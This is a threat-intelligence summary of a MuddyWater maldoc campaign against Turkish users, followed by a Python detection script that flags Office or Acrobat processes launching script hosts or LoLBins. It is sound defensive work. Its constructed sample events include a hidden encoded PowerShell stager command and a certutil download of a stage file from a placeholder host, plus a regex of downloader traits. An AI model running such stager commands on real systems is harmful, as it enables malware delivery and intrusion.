MuddyWater has conducted various campaigns against entities spread throughout the U.S., Europe, the Middle East and South Asia. A typical TTP employed by the group is heavy use of scripting in its infection chains, in languages such as PowerShell and Visual Basic, coupled with frequent use of living-off-the-land binaries (LoLBins). Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign uses malicious PDFs and Microsoft Office documents (maldocs) as the initial infection vector. The maldocs were named so as to masquerade as legitimate documents from the Turkish Health and Interior Ministries. Once opened, they execute a series of scripts on the infected endpoint that serve as downloaders and instrumentors for additional payloads.
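The infection chain summarized above (a document reader launching a script host or LoLBin, which then pulls down further stages) is the part a defender can hunt for in endpoint telemetry. The following is an added example, not code from Talos or from this report, that scores constructed Sysmon-style process-creation events for exactly that pattern. The event records, file paths, command lines and the placeholder URL are all constructed for the example; the binary lists and command-line traits are general heuristics, not indicators from the campaign.

```python
"""Hunt for document readers spawning script hosts or LoLBins.

Added defensive example: scores process-creation events in which Word, Excel,
PowerPoint or Acrobat launches a scripting engine or a living-off-the-land
binary, or in which one script host chains into another with downloader-style
arguments. All sample events below are constructed, not real telemetry.
"""
import os
import re

# Document readers that are the expected parents of maldoc-driven activity.
DOC_READERS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
# Scripting engines MuddyWater-style chains rely on (PowerShell, VBScript, HTA).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
# Common living-off-the-land binaries abused as downloaders/loaders.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}

# Command-line traits typical of script-based stagers (encoded commands,
# hidden windows, policy bypass, URL fetches). Heuristic, not campaign IoCs.
SUSPICIOUS_CMD = re.compile(
    r"(-enc(odedcommand)?\b|downloadstring|downloadfile|invoke-webrequest|"
    r"\bhidden\b|bypass|urlcache|javascript:)",
    re.IGNORECASE,
)

# Constructed sample events (simplified Sysmon Event ID 1 fields).
SAMPLE_EVENTS = [
    {"pid": 3120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n saglik_bakanligi_duyuru.docx'},            # benign open
    {"pid": 4010, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //nologo C:\Users\u\AppData\Local\Temp\loader.vbs'},  # maldoc -> VBS
    {"pid": 4022, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0A"},  # VBS -> PS
    {"pid": 5100, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://placeholder.invalid/stage.txt"},  # LoLBin fetch
    {"pid": 6001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process | Sort-Object CPU"},                # admin use
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    score, reasons = 0, []
    if parent in DOC_READERS and child in SCRIPT_HOSTS:
        score += 3
        reasons.append(f"{parent} spawned script host {child}")
    elif parent in DOC_READERS and child in LOLBINS:
        score += 2
        reasons.append(f"{parent} spawned LoLBin {child}")
    elif parent in SCRIPT_HOSTS and child in SCRIPT_HOSTS:
        score += 1
        reasons.append(f"script host {parent} chained into {child}")
    if child in SCRIPT_HOSTS | LOLBINS and SUSPICIOUS_CMD.search(ev["cmdline"]):
        score += 1
        reasons.append("downloader/stager-style command line")
    return score, reasons


def hunt(events, threshold=2):
    """Return alert dicts for events whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev["pid"], "score": score, "reasons": reasons,
                           "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(f"pid={alert['pid']} score={alert['score']}: {'; '.join(alert['reasons'])}")
```

Run against the constructed events, three of the five are flagged: the Word-to-wscript launch, the wscript-to-PowerShell hop with a hidden, encoded command, and the Excel-to-certutil fetch; the plain document open and the interactive PowerShell session stay below the threshold. In production the same scoring would be applied to real Sysmon or EDR process-creation streams, with the threshold and the binary lists tuned to the environment's baseline.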